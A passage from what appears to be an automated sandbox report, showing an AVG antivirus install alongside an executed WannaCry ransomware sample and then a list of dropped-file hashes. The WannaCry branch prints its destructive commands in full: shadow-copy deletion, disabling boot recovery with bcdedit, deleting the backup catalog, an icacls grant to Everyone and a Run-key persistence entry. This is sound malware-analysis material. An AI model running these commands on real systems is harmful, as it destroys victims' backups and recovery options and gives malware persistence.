                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /catalog:avgRdr2.cat
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5852
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /catalog:avgHwid.cat
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3732
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /catalog:avgVmm.cat
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5692
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /uninstall /catalog:avgRvrt.cat
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6148
                                                                            • C:\Program Files\AVG\Antivirus\AvEmUpdate.exe
                                                                              "C:\Program Files\AVG\Antivirus\AvEmUpdate.exe" /installer /reg
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6660
                                                                            • C:\Program Files\AVG\Antivirus\AvEmUpdate.exe
                                                                              "C:\Program Files\AVG\Antivirus\AvEmUpdate.exe" /installer
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks for any installed AV software in registry
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              • Drops file in Program Files directory
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:432
                                                                            • C:\Program Files\AVG\Antivirus\x86\RegSvr.exe
                                                                              "C:\Program Files\AVG\Antivirus\x86\RegSvr.exe" "C:\Program Files\AVG\Antivirus\x86\aswAMSI.dll"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:8024
                                                                            • C:\Program Files\AVG\Antivirus\RegSvr.exe
                                                                              "C:\Program Files\AVG\Antivirus\RegSvr.exe" "C:\Program Files\AVG\Antivirus\aswAMSI.dll"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Registers COM server for autorun
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:8244
                                                                            • C:\Program Files\AVG\Antivirus\x86\RegSvr.exe
                                                                              "C:\Program Files\AVG\Antivirus\x86\RegSvr.exe" "C:\Program Files\AVG\Antivirus\x86\asOutExt.dll"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:6124
                                                                            • C:\Program Files\AVG\Antivirus\RegSvr.exe
                                                                              "C:\Program Files\AVG\Antivirus\RegSvr.exe" "C:\Program Files\AVG\Antivirus\asOutExt.dll"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Registers COM server for autorun
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:7292
                                                                            • C:\Program Files\AVG\Antivirus\SetupInf.exe
                                                                              "C:\Program Files\AVG\Antivirus\SetupInf.exe" /catinstall:"C:\Program Files\AVG\Antivirus\crts.cat" /basename:pkg_{af98c830-528a-46b9-a60e-2db5d9a76b77}.cat /crtid:E89476E7569FC7413EA11A4461D6E3E784B8B699
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5344
                                                                            • C:\Program Files\AVG\Antivirus\wsc_proxy.exe
                                                                              "C:\Program Files\AVG\Antivirus\wsc_proxy.exe" /svc /register /ppl_svc
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks for any installed AV software in registry
                                                                              • Checks processor information in registry
                                                                              PID:9156
                                                                              • C:\Program Files\AVG\Antivirus\avDump.exe
                                                                                "C:\Program Files\AVG\Antivirus\avDump.exe" --pid 9156 --exception_ptr 000000D43D4FEDA0 --thread_id 9036 --dump_level 0 --handle_data 1 --dump_file "C:\ProgramData\AVG\Antivirus\log\unp310993051447962856x-manual.mdmp" --comment "Cause: VectoredExceptionHandler Exception: sd is not loaded" --min_interval 60
                                                                                7⤵
                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5660
                                                                            • C:\Program Files\Common Files\AVG\Icarus\avg-av\aswOfferTool.exe
                                                                              "C:\Program Files\Common Files\AVG\Icarus\avg-av\aswOfferTool.exe" /install_secure_browser /cmd:"/make_default /run_source=avg_install /language=en" /config_def:"C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av\config.def"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:7112
                                                                              • C:\Program Files\Common Files\AVG\Icarus\avg-av\securebrowser_setup.exe
                                                                                "C:\Program Files\Common Files\AVG\Icarus\avg-av\securebrowser_setup.exe" /s /make_default /run_source=avg_install /language=en
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:6288
                                                                            • C:\Program Files\Common Files\AVG\Overseer\overseer.exe
                                                                              "C:\Program Files\Common Files\AVG\Overseer\overseer.exe" /skip_uptime /skip_remediations
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:6460
                                                                            • C:\Program Files\AVG\Antivirus\defs\24040802\engsup.exe
                                                                              "C:\Program Files\AVG\Antivirus\defs\24040802\engsup.exe" /avg /get_latest_ga_client_id /get_latest_landingpageid_cookie /get_latest_pagedownloadid_cookie
                                                                              6⤵
                                                                                PID:9104
                                                                            • C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av-vps\icarus.exe
                                                                              C:\Windows\Temp\asw-9f164a38-f15d-492c-9b2c-cd835b7d6279\avg-av-vps\icarus.exe /cookie:mmm_bav_003_999_b8d_m:dlid_FREEGSR-FAD-GLOWEB-8542-1 /edat_dir:C:\Windows\Temp\asw.d897af7033d96f4f /track-guid:4b1c47d1-182d-4533-872e-ebabf336095c /sssid:4872 /er_master:master_ep_d8557de3-7510-44de-baf1-7294352dcb4e /er_ui:ui_ep_842fece5-c674-4974-af38-b1842b2e8125 /er_slave:avg-av-vps_slave_ep_bf6446fb-a955-4b1a-8bb4-2e1862aa5efd /slave:avg-av-vps
                                                                              5⤵
                                                                              • Uses Session Manager for persistence
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              • Drops file in Program Files directory
                                                                              • Checks processor information in registry
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4420
                                                                              • C:\Program Files\AVG\Antivirus\defs\24040802\engsup.exe
                                                                                "C:\Program Files\AVG\Antivirus\defs\24040802\engsup.exe" /prepare_definitions_folder
                                                                                6⤵
                                                                                • Drops file in Drivers directory
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks for any installed AV software in registry
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Program Files directory
                                                                                • Checks processor information in registry
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:8812
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:2220
                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                        1⤵
                                                                          PID:2400
                                                                        • C:\Windows\System32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                          1⤵
                                                                            PID:3208
                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
                                                                            1⤵
                                                                            • Drops startup file
                                                                            • Sets desktop wallpaper using registry
                                                                            PID:4612
                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                              attrib +h .
                                                                              2⤵
                                                                              • Views/modifies file attributes
                                                                              PID:1344
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls . /grant Everyone:F /T /C /Q
                                                                              2⤵
                                                                              • Modifies file permissions
                                                                              PID:1144
                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                              taskdl.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:4532
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c 190841712576141.bat
                                                                              2⤵
                                                                                PID:5024
                                                                                • C:\Windows\SysWOW64\cscript.exe
                                                                                  cscript.exe //nologo m.vbs
                                                                                  3⤵
                                                                                    PID:5092
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +h +s F:\$RECYCLE
                                                                                  2⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:1100
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:424
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                    TaskData\Tor\taskhsvc.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2956
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /c start /b @[email protected] vs
                                                                                  2⤵
                                                                                    PID:4744
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4512
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                        4⤵
                                                                                          PID:1528
                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                            wmic shadowcopy delete
                                                                                            5⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3388
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      taskdl.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3748
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:224
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Sets desktop wallpaper using registry
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2480
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mhvdvdzzqm115" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                      2⤵
                                                                                        PID:4524
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mhvdvdzzqm115" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                          3⤵
                                                                                          • Adds Run key to start application
                                                                                          • Modifies registry key
                                                                                          PID:956
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3532
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4580
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2560
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2800
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1092
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4836
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1680
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5552
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8668
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8732
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8128
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5152
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5408
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                        taskdl.exe
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8780
                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                      C:\Windows\system32\vssvc.exe
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:792
                                                                                    • C:\Program Files\AVG\Antivirus\afwServ.exe
                                                                                      "C:\Program Files\AVG\Antivirus\afwServ.exe"
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks for any installed AV software in registry
                                                                                      • Checks processor information in registry
                                                                                      PID:8928
                                                                                    • C:\Program Files\AVG\Antivirus\afwServ.exe
                                                                                      "C:\Program Files\AVG\Antivirus\afwServ.exe"
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks for any installed AV software in registry
                                                                                      • Checks processor information in registry
                                                                                      PID:6052
                                                                                    • C:\Program Files\AVG\Antivirus\afwServ.exe
                                                                                      "C:\Program Files\AVG\Antivirus\afwServ.exe"
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks for any installed AV software in registry
                                                                                      • Checks processor information in registry
                                                                                      PID:5864
                                                                                    • C:\Program Files\Common Files\AVG\Icarus\avg-av\icarus.exe
                                                                                      "C:\Program Files\Common Files\AVG\Icarus\avg-av\icarus.exe" /repair:avg-av /silent /ii_reason:FwSvcRecovery
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                      • Drops file in Program Files directory
                                                                                      • Drops file in Windows directory
                                                                                      • Checks processor information in registry
                                                                                      • Modifies registry class
                                                                                      PID:8424
                                                                                      • C:\Program Files\Common Files\AVG\Icarus\avg-av-vps\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus.exe
                                                                                        "C:\Program Files\Common Files\AVG\Icarus\avg-av-vps\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus.exe" /silent /ii_reason:FwSvcRecovery /er_master:master_ep_8f0edeaf-b1fe-4b62-9536-bb69deb3940e /er_ui:ui_ep_13eb8800-36de-4ca4-9e1a-0400e2a731d3 /er_slave:avg-av-vps_slave_ep_fd34204d-1afa-443e-b2d2-6d2cb071ac53 /slave:avg-av-vps
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                        • Drops file in Windows directory
                                                                                        • Checks processor information in registry
                                                                                        • Modifies registry class
                                                                                        PID:6084
                                                                                      • C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus.exe
                                                                                        "C:\Program Files\Common Files\AVG\Icarus\avg-av\temp\asw-1264f57c-71b3-4eb6-9ab4-c31e7c924693\icarus.exe" /silent /ii_reason:FwSvcRecovery /er_master:master_ep_8f0edeaf-b1fe-4b62-9536-bb69deb3940e /er_ui:ui_ep_13eb8800-36de-4ca4-9e1a-0400e2a731d3 /er_slave:avg-av_slave_ep_c23c02de-4867-4e6d-bd9b-18e59fe58328 /slave:avg-av
                                                                                        2⤵
                                                                                        • Uses Session Manager for persistence
                                                                                        • Executes dropped EXE
                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                        • Drops file in Windows directory
                                                                                        PID:2676
                                                                                      • C:\Program Files\Common Files\AVG\Icarus\avg-av\icarus_ui.exe
                                                                                        "C:\Program Files\Common Files\AVG\Icarus\avg-av\icarus_ui.exe" /sbr /eid=d555e711-1e48-45a2-b552-9f88f9be475d
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8672
                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:1420
                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:8420
                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa39ee055 /state1:0x41c64e6d
                                                                                      1⤵
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:5872
                                                                                    • C:\Program Files\AVG\Antivirus\AVGUI.exe
                                                                                      "C:\Program Files\AVG\Antivirus\AVGUI.exe" /welcome
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6788

                                                                                    Network

                                                                                    MITRE ATT&CK Enterprise v15

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Program Files\AVG\Antivirus\1033\Base.dll

                                                                                      Filesize

                                                                                      64KB

                                                                                      MD5

                                                                                      805f41766208840740c2125f66849630

                                                                                      SHA1

                                                                                      25555df90c3814ceb6523583720c94c920ec9470

                                                                                      SHA256

                                                                                      061f3fd4cc9d1dd21654a13d9e8ac981f39ba120d690ab08b7f9f4d40387bdc4

                                                                                      SHA512

                                                                                      d9fad7c0cea54a76b85df7cac4caebf6f3fac1577537bed74478940a5924d6ec08ba9c5400cadb03da9fe6bdcbc6f7bdcd6390eb093b1c7878a8c8548a226400

                                                                                    • C:\Program Files\AVG\Antivirus\1033\Boot.dll

                                                                                      Filesize

                                                                                      24KB

                                                                                      MD5

                                                                                      b0b2d177f363f79c4a2fc0439f7bec22

                                                                                      SHA1

                                                                                      f5d041e3f2e2003ee0b92cdb2415ac562550267f

                                                                                      SHA256

                                                                                      181b94908a6a89839749a3d2145a4a5f63ed198c89e3ca5851f2466a48e5557c

                                                                                      SHA512

                                                                                      f8162d982a519fd1cdf1e07935477f7f1f2edf8b520db3a1ca454e6f7cc00fd7706dcf73829ad19dfa8621a6852dee73871bebca431d6ed145cb68a40f693ba6

                                                                                    • C:\Program Files\AVG\Antivirus\1033\aswClnTg.htm

                                                                                      Filesize

                                                                                      703B

                                                                                      MD5

                                                                                      4ebf04faf20dff03f5d62d5af5f32151

                                                                                      SHA1

                                                                                      7088e12344219071c118ddc11415c7a8643e52da

                                                                                      SHA256

                                                                                      c27d162c8c40c816e09a3a0093e7fcf30df436e3266065633450595ba156ed53

                                                                                      SHA512

                                                                                      b784cdcc2ec75da2faf00ccafc211cb3fc874f085000bdb6bbd2e05fb1d11dd966cb04e5a1c8f4c91b0720e3caa7a8a82c753c87546005a969d27ece581af163

                                                                                    • C:\Program Files\AVG\Antivirus\1033\aswClnTg.txt

                                                                                      Filesize

                                                                                      79B

                                                                                      MD5

                                                                                      f27e56279b0de10cf9330dd15c36f997

                                                                                      SHA1

                                                                                      3aae430d7f3248afe29a4e70919570005bc4743a

                                                                                      SHA256

                                                                                      f49a2735886ec0a1199973160b88ac88dee576588f4c0a211ed5ebf44c566067

                                                                                      SHA512

                                                                                      bbd01eae02dacd6452a1edb191d1aaf00f2009789676cedbb5e50d39627ad7d86176763294c63c48a8e84bb77074363c5855aa42c4e601584748318751f6b7cc

                                                                                    • C:\Program Files\AVG\Antivirus\1033\aswInfTg.htm

                                                                                      Filesize

                                                                                      643B

                                                                                      MD5

                                                                                      7db7dbd7815bebd69c5005b16f191731

                                                                                      SHA1

                                                                                      94d9ca774f6e0c153666e7179bedddc1d0771d3b

                                                                                      SHA256

                                                                                      14d52b2db6114ec914d5a43b0d8dc285911da75044b19909c914af874ee54a90

                                                                                      SHA512

                                                                                      ff6052349bdc78d96aa1491d8ea8c764e53c9ef02ea1f2a446d90c153ff9f921fd301afe83a6f5c65fa03eee23a76c7a0cab72f73e41b5bfdced0ca2ea6adcfc

                                                                                    • C:\Program Files\AVG\Antivirus\1033\aswInfTg.txt

                                                                                      Filesize

                                                                                      438B

                                                                                      MD5

                                                                                      20511513a692ace563587fd8119f022e

                                                                                      SHA1

                                                                                      a3a058154b7f3370ab07026bdf9c61d0487663f0

                                                                                      SHA256

                                                                                      f0215ceabc6e0fa003e8079879956603c35466b7e5d998cc84789ade5cfb9119

                                                                                      SHA512

                                                                                      189efac592953ec4fd30263613e67abb7412ef11ac3a5802bc8f27b01a24e593493700226f012d43999e9f53e43623a209d230741327021946d8e79d62db2b7a

                                                                                    • C:\Program Files\AVG\Antivirus\1033\uiLangRes.dll

                                                                                      Filesize

                                                                                      248KB

                                                                                      MD5

                                                                                      d98f536e63bbe12dd358355235376fad

                                                                                      SHA1

                                                                                      205af6f1f1773d236111073c6bc027221c3404c8

                                                                                      SHA256

                                                                                      708087ca802e5e31f8ede9b80f72cb088d344a7da8fe0eb514b4f322d0a2a18a

                                                                                      SHA512

                                                                                      2a6546312f1a7d31c9dbfe73b2064cb5a9e2330fca0f83c7df9c708222a9dca0d84e1c129cdc0394c43783c3f4104c1984f9bfc38df8e842f9056822b59339f5

                                                                                    • C:\Program Files\AVG\Antivirus\AVGSvc.exe

                                                                                      Filesize

                                                                                      783KB

                                                                                      MD5

                                                                                      dfa71c58892696bd6eac3240517e6b10

                                                                                      SHA1

                                                                                      db95342bc05028c84f4cda96e27add363a00d7c8

                                                                                      SHA256

                                                                                      fc1c2657ee7eac334ff5bb867ac41370ecc4dd96eb7acf7509d075ba16fc87c7

                                                                                      SHA512

                                                                                      50f75e8eb501ed9b8bd4b2babb6ce71a1ad6c6d0255f849be895e9f5334ce776af26379249529f6f062e09f6e4a9417839f4d143d5f54831facaf0f4a2a2d093

                                                                                    • C:\Program Files\AVG\Antivirus\AVGUI.exe

                                                                                      Filesize

                                                                                      21.4MB

                                                                                      MD5

                                                                                      f8d96252a090e7c18e380a15e7e5b311

                                                                                      SHA1

                                                                                      d85f1c30bd3526ee633c9120b573ef4485d60ae1

                                                                                      SHA256

                                                                                      c6c9a2c4292592d70a2a650d8dc09d54a28708f143b7609e448c6229d216562b

                                                                                      SHA512

                                                                                      c7264f9bc7ab9ec207b61711af509bd99d8fba25cda977c805e97c2d2751d76f174c3eedac5afc450b72aebeaa97f250affbbaf16854069b40507967b665d4c6

                                                                                    • C:\Program Files\AVG\Antivirus\AavmRpch.dll

                                                                                      Filesize

                                                                                      720KB

                                                                                      MD5

                                                                                      6ff7c999c2653735ab6a59bbf52e28d9

                                                                                      SHA1

                                                                                      d3202f17735517cfb792ec08288c5902a41df123

                                                                                      SHA256

                                                                                      81bae628ebc2a17d163c88da7b1e408fb085b0875748ec480eef6247a7537407

                                                                                      SHA512

                                                                                      0f365b5329dfcefa9b3cf8d4ab0f08958a86e8d95119d00f568377ce8b8a9bb389c0d6a494c35d39de740516af5fb8a7af3cd6d3c986d907851fc7b4334b73ac

                                                                                    • C:\Program Files\AVG\Antivirus\AvBugReport.exe

                                                                                      Filesize

                                                                                      4.8MB

                                                                                      MD5

                                                                                      f77adb7ba992ba9662aa64f7589224fd

                                                                                      SHA1

                                                                                      0c569997d87360f572d53441613708fbad495ef3

                                                                                      SHA256

                                                                                      eb217efeccf56dcaf84f424626502735ea18701f38b4b368fc464cd8082e1198

                                                                                      SHA512

                                                                                      51246f69c30231e3a5a651355d5d5f7cb09ce649fe243450bb6d7e3780926bc4007ecbc01a540eb95394eb0e605c920d567d669ae482c17c9f2406fee7001df1

                                                                                    • C:\Program Files\AVG\Antivirus\AvConsent.exe

                                                                                      Filesize

                                                                                      766KB

                                                                                      MD5

                                                                                      42369cb5b43f12e0e94d2023adf13175

                                                                                      SHA1

                                                                                      1f612e57b008efe6ac0a07c081f51c9b2c3fb129

                                                                                      SHA256

                                                                                      736d3e8e2b51d8a067a96a27d8a9135e389855d51220c903b40ec714daceca5d

                                                                                      SHA512

                                                                                      7fb64c17708ba706dea803bfde1c5a82c5336728f372342500fe8c0a3ec12733f4fd62bcee245a551486fa57e93fdbda8eb6c5aca9ab850d3b68818770f33a5f

                                                                                    • C:\Program Files\AVG\Antivirus\AvDump.exe

                                                                                      Filesize

                                                                                      3.4MB

                                                                                      MD5

                                                                                      01147a8dee176f1bb08a8413e0bcbc7d

                                                                                      SHA1

                                                                                      013ae29f5f204659323d57c1f7d69f3d0947da2e

                                                                                      SHA256

                                                                                      6941e6660968e2bfdf2cf2843964957eedcdafbb02bf75298399c499e54dd2a7

                                                                                      SHA512

